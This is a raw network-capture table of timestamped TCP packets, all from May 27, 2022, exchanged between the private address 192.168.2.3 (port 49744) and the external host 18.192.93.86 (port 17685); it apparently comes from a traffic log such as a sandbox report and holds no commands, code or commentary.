May 27, 2022 19:28:21.248234034 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248234987 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248250008 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248256922 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248258114 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248280048 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248302937 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248322964 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248344898 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248346090 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248368979 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248383999 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248392105 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248410940 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248414993 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248425961 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248436928 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248445988 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248461008 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248482943 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248498917 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248501062 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248519897 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248527050 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248533964 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248550892 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248550892 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248568058 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248579979 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248581886 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248605967 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248608112 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248629093 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248648882 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248652935 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248672962 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248672962 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248697042 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248701096 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248708010 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248718977 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248725891 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248737097 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248742104 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248750925 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248764992 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248775959 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248790026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.248790979 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248827934 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248840094 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248851061 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248857021 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.248891115 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249785900 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249813080 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249834061 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249855042 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249864101 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249870062 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249900103 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249900103 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249926090 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249928951 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249949932 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249963999 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249973059 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249974966 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.249986887 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.249999046 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250000000 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250020981 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250032902 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250042915 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250046015 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250055075 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250066042 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250078917 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250092030 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250112057 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250114918 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250138044 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250148058 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250164986 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250185966 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250189066 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250210047 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250219107 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250232935 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250247955 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250256062 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250256062 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250279903 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250289917 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250302076 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250313044 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250324965 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250327110 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250339031 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250349998 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250370026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250377893 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250390053 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250396013 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250412941 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250421047 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250433922 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250463009 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250473022 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250699043 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250722885 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250744104 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250751019 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250766039 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250787973 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250792980 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250814915 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250837088 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250847101 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.250943899 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250967979 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.250993013 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251018047 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251035929 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251058102 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251077890 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251085997 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251116037 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251127958 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251132011 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251137018 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251152039 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251168013 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251173019 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251195908 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251203060 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251219034 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251224995 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251240969 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251241922 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251255035 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251262903 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251286030 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251288891 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251310110 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251327991 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251332998 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251359940 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251410007 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251539946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251619101 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251770973 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251796007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251816988 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251837969 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251852989 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251868010 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251885891 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251889944 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251915932 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251915932 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251938105 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251944065 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.251961946 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251983881 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.251993895 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252006054 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252028942 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252032995 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252049923 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252053976 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252070904 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252074003 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252085924 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252094030 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252100945 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252109051 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252123117 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252146006 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252159119 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252166033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252171040 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252185106 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252188921 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252204895 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252213001 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252233982 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252253056 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252254963 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252269030 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252279997 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252283096 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252301931 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252306938 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252317905 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252326965 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252331018 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252348900 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252370119 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252370119 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252394915 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252403975 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252418041 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252418995 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252441883 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252441883 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252461910 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252471924 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252509117 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252518892 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252522945 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252559900 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252567053 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252568007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252574921 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252620935 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252635002 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252644062 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252783060 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252810955 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252832890 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252836943 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252878904 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252891064 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252891064 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252916098 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252938986 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252945900 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.252963066 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252983093 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.252991915 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253002882 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253006935 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253031015 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253036022 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253051043 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253077984 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253081083 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253088951 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253104925 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253125906 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253127098 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253149033 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253156900 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253170967 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253192902 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253194094 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253206968 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253215075 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253236055 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253247976 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.253745079 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253768921 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.253788948 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270131111 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270167112 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270185947 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270214081 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270230055 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270251989 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270271063 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270291090 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270309925 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270329952 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270349026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270368099 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270385027 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270404100 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270422935 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270443916 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270462036 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270479918 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270498991 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270515919 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270553112 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270575047 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270596027 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270613909 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270632982 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270652056 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270673037 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270693064 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270711899 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270730019 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270828009 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270848989 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270868063 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270888090 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270905972 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270924091 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270941973 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270960093 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270978928 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.270997047 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271014929 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271033049 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271050930 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271069050 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271089077 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271106958 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271125078 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271142960 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271161079 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271178961 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271198034 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271217108 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271234035 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271251917 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271269083 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271286011 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271303892 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271321058 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271339893 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271357059 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271373987 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271393061 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271413088 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271430969 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271447897 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271466017 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271482944 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.271502972 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.273715973 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.273890972 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.274316072 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275023937 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275268078 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275291920 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275388956 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275516987 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.275916100 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276068926 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276091099 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276110888 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276129007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276149035 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276170015 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276189089 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276207924 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.276225090 CEST	17685	49744	18.192.93.86	192.168.2.3
